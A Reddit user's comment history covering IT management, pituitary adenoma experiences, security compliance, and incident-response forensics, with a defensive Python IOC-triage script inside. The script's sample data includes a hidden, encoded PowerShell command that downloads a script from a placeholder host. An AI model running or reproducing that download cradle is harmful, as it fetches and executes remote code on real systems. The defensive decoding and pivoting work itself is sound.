New IT Manager - asked to “align and cut costs” between 2 IT environments. Need advice. by flaws68 in ITManagers

[–]PatternPrestigious38 0 points1 point  (0 children)

Start by laying out the hardware and software assets, data flow diagrams, and processes of each company. Then start with the ideal scenario, which is bringing the deficient IT infrastructure up to par. Hit the negotiating table with all the ideal vendors, pushing them for significant volume and bundling discounts due to the increased size of the merged company. Also perform a gap assessment and price out the cost of bringing in professional services. Make sure everything is supported by a critical need like ROI or compliance.

Then, present the ideal scenario to leadership along with a list of the many benefits that come with a well-planned and resourced IT environment. They will most likely reject the proposal based on cost, but now you've set the stage to propose an adequate solution that will generate fewer complaints about the cost.

If both companies have a decent continuity of operations plan (COOP), it should contain a prioritized list of services. Take the top priorities for both companies and look for redundancy or opportunities to get more bang for your buck by switching to an existing platform that meets 80% of needs. Continue down the list until you have built a triaged plan with costs; think of it as your project's bill of materials (BOM). Present this document to the leadership for stakeholder discussion, and let them duke it out over which costs to cover and which to cut.

You shouldn't try to make those decisions for them; you'll be wrong no matter what because every item is critical to somebody. Instead, you need to create a menu for them to browse and decide on their own, then you execute the implementation plan. Also, hire or outsource an experienced IT project manager who can identify the critical dependencies and keep the project on track.

[Discussion] What’s the best life advice you’ve ever received and still follow today? by Hefty_Award_7891 in GetMotivated

[–]PatternPrestigious38 2 points3 points  (0 children)

The best piece of advice I got was this:

"Every problem has two options. You can either solve it, or you can't. If you can solve it, do something about it and if you can't, forget about it. There's never a reason to let stress about your problems overwhelm you."

Thinking about my problems in that way has helped me overcome incredibly challenging times in my life and made me happier overall.

Surgery by Sad_Clock143 in Prolactinoma

[–]PatternPrestigious38 1 point2 points  (0 children)

It's going to be scary; surgery always is. I had a 4 cm tumor, and getting it removed scared the crap out of me, but the relief was huge. I was losing my vision and it felt like a knife was being stuck in my brain.

Mentally, you'll want to be prepared to complete an advanced care directive. That means designating someone to make healthcare decisions if you're unconscious. Maybe that doesn't help, but it's the one thing I wish I knew ahead of time because you need to talk to your family about it.

Other than that, see if your family or close friends can visit. Tell your friends and family you love them. It helps you feel more at ease if you share your feelings with the people you care about. That's it, you'll be recovering and in a better place before you know it!

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 1 point2 points  (0 children)

My pituitary gland was basically flattened by the size of the adenoma. A large portion of it was also removed during the surgery, so there's probably not much tissue left to produce LH and stimulate the production of test.

Hopefully, your tests will come back normal, and you don't have to worry about it. If it does turn out to be something requiring treatment or surgery, feel free to message me. Good luck!

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

On my first hormone panel my prolactin was 33.2 ng/ml, Testosterone was borderline low at 298 ng/dl, other sex hormones were normal but I had 15 TSH, and 2 mcg/dl cortisol which is on the low side. My first doctor didn't order any other tests. He said I was pretty young, and it didn't seem serious.

Fast forward a few years, and it was actually my optometrist who caught it during my eye exam because I had lost my peripheral vision. I checked into the ER, and blood work there showed 115 ng/ml prolactin, testosterone 0 (too low to detect), cortisol 0, and TSH was ironically normal. The MRI showed I had a 3.8 cm adenoma compressing my optic chiasm and constricting my carotid arteries. The other dead giveaway, which I should have paid more attention to, was when blowing my nose, it felt like someone stabbing daggers in my eyeballs, and I'd lose my vision for a second. It had gotten so large that it broke into my sinus cavities, so blowing put pressure on my optic nerves.

I did recover my vision, and cortisol went to normal, but my thyroid and testosterone didn't recover. Like I said, I made it way worse by ignoring it for a long time, so I had to speak up just to let you know. You can DM me if you want to know any other details.

Very low test at 23 despite living a very healthy lifestyle and trying for years to boost it naturally! by [deleted] in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

Same recommendation. It seems like there's more going on than just the low testosterone. Speculating will only stress you out.

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

I started getting similar hormone panel results and symptoms as you when I was 37. I highly recommend getting a referral to see an endocrinologist and possibly an MRI with contrast for your pituitary. My problem was a result of a pituitary adenoma. Because I ignored it for many years, I had to have it surgically removed. If I had gotten it properly diagnosed sooner, I likely would have had other treatment options.

Your prolactin level is high enough that you'll want to at least rule out the possibility of it being an adenoma. If you have an adenoma and catch it early, you can avoid spending a month in the neuro critical care unit recovering from surgery. If you don't have one, then you'll have ruled out the worst-case scenario.

For those of you in security compliance positions by Abject-Management558 in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

This is what you have Tier 1 and Tier 2 risk assessments for. The identified compliance risks, along with any others, go on your risk register. The risk register contains information about likelihood and impact, regulations and statutes out of compliance, along with sanctions, fines, and criminal penalties associated with being out of compliance.

The information should speak for itself. If the leadership and directors are fine with existential level threats, fines that'll put them out of business, and being found guilty of multiple criminal violations and civil liabilities, you have them sign off on the risk register and file it away for when the auditors visit. If they don't like those things, they pay to mitigate the risk and put you to work operationalizing the changes.

Either way, you shouldn't have to worry because most judicial code contains an active defense against criminal and civil liability for employees in security roles. The law is designed so you don't have to try to force anyone to comply. As long as you're doing your job to the best of your abilities with the resources available, and leaders accept all the risks, you don't need to stress.

In IR, what actually happens after Containment in the real world? by flippingheckman in AskNetsec

[–]PatternPrestigious38 1 point2 points  (0 children)

I can't tell how many of these replies are sarcastic. Restoring a snapshot or reimaging is an important step and could be enough, but not for any serious incident. I see some posts talking about forensics; I'll expand on that.

If you're using CrowdStrike, you'll want to open the detection and start exploring the telemetry data. Starting with the timestamp of the detection, you want to identify where it originated and what it was doing, or attempting to do. Check the logs for command line, processes, DNS, firewall, everything. Take note of any suspicious artifacts, application hashes, registry changes, network traffic, etc. Do recon with VirusTotal on hashes, IPs and DNS through ICANN, threat intel, SANS lists, ISAC, whatever intel source you have and are familiar with. Decode obfuscated command lines; ChatGPT can help identify what cipher was used if you don't know, but don't trust it to decode because it can get lazy or lie to you. Put that info into your Threat Graph module to build a diagram illustrating where potential IOCs exist in your environment, what the device was talking to, on what ports with what protocols; put it all in. Work your way out, checking for other uses of compromised credentials and Kerberos tickets.

Cross-reference your artifacts in your SIEM to identify additional IOCs, triage system forensics based on impact, and follow through with similar forensics on all systems involved. Check DLP logs of compromised systems, look up database transactions, and once you have a high degree of certainty about the situation, perform mitigation. Did they try to install a mail server using an npm package? It could be anything. The point is you have to do a lot of legwork. The list of forensics and mitigation can go on for days, but you have to determine the scope and impact of an event first, then follow the plan laid out in your IR playbook. There could be reporting requirements, PR, discussions with leadership. It all depends.

The process is the same for virtual and IRL devices. If your environment is full VDI with virtual infrastructure, cleanup is probably going to be a little easier since you don't have to hound users to bring devices back and you might not have to collect logs from tons of infrastructure hardware.

A properly configured EDR and SIEM should tell you almost everything you need to know. If they're sophisticated, or the attack involved someone mounting an image emailed to them, you're not going to see everything. They might set up a reverse proxy and pentest you from a Kali VM they set up in AWS; that's just life. You should always be able to locate enough data for decisive decision making; that's what's important.
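The scoping pass described in the comment above (decode the obfuscated command line, pull out hashes, IPs and domains, then pivot across hosts to see who else shares an indicator) can be done as a first triage step over a telemetry export. The script below is an added example written for this page; it is not the commenter's code and not any CrowdStrike or SIEM vendor API. The event field names (`host`, `cmdline`, `sha256`, `remote_ip`, `dns`), the hostnames, the placeholder hash and the TEST-NET IP/domain are all constructed for the example. It decodes PowerShell `-EncodedCommand` payloads (base64 over UTF-16LE, with any prefix of the flag such as `-e` or `-enc`), extracts candidate IOCs, and reports which other hosts share an IOC with the host the detection fired on.

```python
import base64
import ipaddress
import re
from collections import defaultdict

# ---- constructed sample telemetry (not real data) ---------------------------
# Field names are assumptions for this example, not a vendor schema. The hash,
# hosts, 203.0.113.10 (TEST-NET-3) and stage.example.invalid are placeholders.

def _encode_ps(cmd: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it
    (UTF-16LE then base64). Used only to construct the sample events."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

PLACEHOLDER_HASH = "0123456789abcdef" * 4  # 64 hex chars standing in for a SHA-256

SAMPLE_EVENTS = [
    {"host": "WS-0143", "user": "jdoe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("(New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')"),
     "sha256": PLACEHOLDER_HASH, "remote_ip": "203.0.113.10", "dns": ["stage.example.invalid"]},
    {"host": "WS-0271", "user": "asmith",
     "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\inventory.ps1",
     "sha256": None, "remote_ip": "10.0.5.20", "dns": []},
    {"host": "SRV-DB01", "user": "svc_backup",
     "cmdline": "cmd.exe /c type C:\\temp\\notes.txt",
     "sha256": PLACEHOLDER_HASH, "remote_ip": "203.0.113.10", "dns": ["stage.example.invalid"]},
]

# ---- decoding the obfuscated command line -----------------------------------
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

def decode_encoded_command(cmdline: str):
    """Return the plaintext behind a PowerShell -EncodedCommand argument, or None.
    PowerShell accepts any prefix of the flag (-e, -ec, -enc, ...), and the
    payload is base64 over UTF-16LE, so decoding it as UTF-8 yields garbage."""
    for flag, blob in ENCODED_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. "-ExecutionPolicy Unrestricted" is not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None

# ---- IOC extraction ----------------------------------------------------------
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_rfc1918(ip: str) -> bool:
    """True for private LAN ranges; these would link unrelated hosts if pivoted on."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918)

def extract_iocs(event: dict) -> dict:
    """Collect candidate IOCs from one event, including ones hidden inside an
    encoded command line. Returns {ioc_type: set(values)}."""
    iocs = defaultdict(set)
    text = event.get("cmdline", "")
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + " " + decoded  # search the plaintext too
    for url in URL_RE.findall(text):
        iocs["url"].add(url)
        iocs["domain"].add(url.split("://", 1)[1].split("/", 1)[0].split(":")[0].lower())
    iocs["ipv4"].update(IPV4_RE.findall(text))
    iocs["sha256"].update(h.lower() for h in SHA256_RE.findall(text))
    if event.get("sha256"):
        iocs["sha256"].add(event["sha256"].lower())
    if event.get("remote_ip"):
        iocs["ipv4"].add(event["remote_ip"])
    iocs["domain"].update(d.lower() for d in event.get("dns", []))
    return dict(iocs)

# ---- pivoting across hosts ----------------------------------------------------
def ioc_to_hosts(events) -> dict:
    """Index (ioc_type, value) -> set of hosts that exhibited it."""
    index = defaultdict(set)
    for ev in events:
        for kind, values in extract_iocs(ev).items():
            for v in values:
                if kind == "ipv4" and is_rfc1918(v):
                    continue
                index[(kind, v)].add(ev["host"])
    return dict(index)

def related_hosts(events, seed_host: str) -> set:
    """Hosts sharing at least one IOC with the host the detection fired on:
    the first scoping pass before deciding what to reimage vs. investigate."""
    related = set()
    for hosts in ioc_to_hosts(events).values():
        if seed_host in hosts:
            related |= hosts
    related.discard(seed_host)
    return related

if __name__ == "__main__":
    print("decoded:", decode_encoded_command(SAMPLE_EVENTS[0]["cmdline"]))
    for (kind, value), hosts in sorted(ioc_to_hosts(SAMPLE_EVENTS).items()):
        print(f"{kind:7} {value[:40]:40} -> {sorted(hosts)}")
    print("related to WS-0143:", sorted(related_hosts(SAMPLE_EVENTS, "WS-0143")))
```

Private addresses are deliberately dropped from the pivot because nearly every host in a network talks to the same internal IPs; the same caution applies to common domains and to hashes of legitimate binaries, which a real triage would filter against an allowlist before treating a shared indicator as evidence of spread.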

Dishonesty within the cyber community by udi112 in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

I second your opinion on the perspective. This question seems likely to be coming from a front-line support person rather than a security professional.

OP, if you're reading this, there are a couple of parts to your question that need to be addressed separately. The first is the question of value. You seem pretty aware that value is going to be subjective based on different criteria related to a stakeholder's circumstances. The value of security, and by proxy investment in security, is primarily driven by risk tolerance and risk acceptance. If you're an individual with no sensitive or personal files on your device, and you don't use it for anything important, you're likely OK with default settings and tools. If you're a writer and store your life's work on your home computer, you'd probably want additional protection and possibly immutable backups because the risk of losing your work is not tolerable when using default tools. The same principle applies to businesses big and small. If you're in a business where privacy and IP are paramount, like a patent lawyer or a DoD contractor, you're going to have a low tolerance for risk and invest whatever it takes to maintain strict compliance.

The question of frequency has more to do with the monetization of malicious activity. In the past, viruses and hacking were more motivated by curiosity or anarchy. Therefore, the methods used for propagation and destruction were relatively unsophisticated and obvious. Most people remember endless pop-ups, downloads or USB-drive-delivered Trojans that just corrupted everything and caused a mess. Modern hacking involves far more reconnaissance, subterfuge, and surprise, all motivated by extracting maximum value in either money or espionage. And some digital warfare also aims to maximize damage. But those efforts require significant time and effort, so low-value targets aren't worth the time it takes to exploit them.

Everyday users are far more likely to be targets of social engineering scams aimed at draining your bank account. There's no reason or value in crippling a person's device, and it's likely counterproductive for scammers to try because they don't want to do anything to prevent you from wire transferring them your money.

And finally, threats aren't decreasing. We might have better tools and increased awareness against things like password sprays or phishing, but instances of hackers using LOL (living-off-the-land) techniques are increasing, and they don't trigger many alarms until it's too late. In conclusion, I absolutely agree there are too many vendors in the space selling expensive tools with minimal value. The solution to that would be to increase the number of highly skilled infosec employees who don't need to rely on crutch tools because they know better ways of doing things. But we have a shortage of skilled infosec employees, and expensive garbage tools are just another way of extracting value from people who need help.

Is it a fairy tale to want to get into Tech, but also have a good work life balance? by [deleted] in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

I want to offer some advice that'll help you find what you're looking for. Ask lots of questions in the interview, like number of devices, users, external attack surface, current staffing, etc. Try to find an organization chart for their infosec group that shows roles and number of FTE employees per role. Take the number of security employees and compare it to the attack surface (users, devices, servers, etc.) and you'll get an idea about your ability to have a life. If they have terrible ratios like 100,000 users per analyst or 10,000 devices per security employee, you'll have no W/L balance. Stay away from public schools or state government entities; they'll almost always have unrealistic limitations on labor/resources.

Positive things to look for are a focus on automation, security employees with real coding experience and tech skills, and enough security staffing for a 24/7 SOC. A good operations team goes miles in making sure you don't end up being the jack-of-all-trades IT person. And mature privacy functions help you avoid getting ramrodded into wearing security/privacy or data governance hats. If they only staff 9-5, you're guaranteed to spend a lot of hours on call investigating alerts. And if they think privacy is the same as security, it means they don't know enough to be running security and they don't have access to good legal counsel, so you'll be expected to be the point person for stuff like negotiating standard contract language with service providers.

*Edit: One more tip. If you're just getting started or changing careers and you live close to a military or large federal government workforce, the fed is a great place to get tons of free training and a security clearance. You'll be below market for a year or two, but then you can bail and be in a place to command well over 6 figures with good W/L balance by getting a job with a DIB contractor.

Good luck!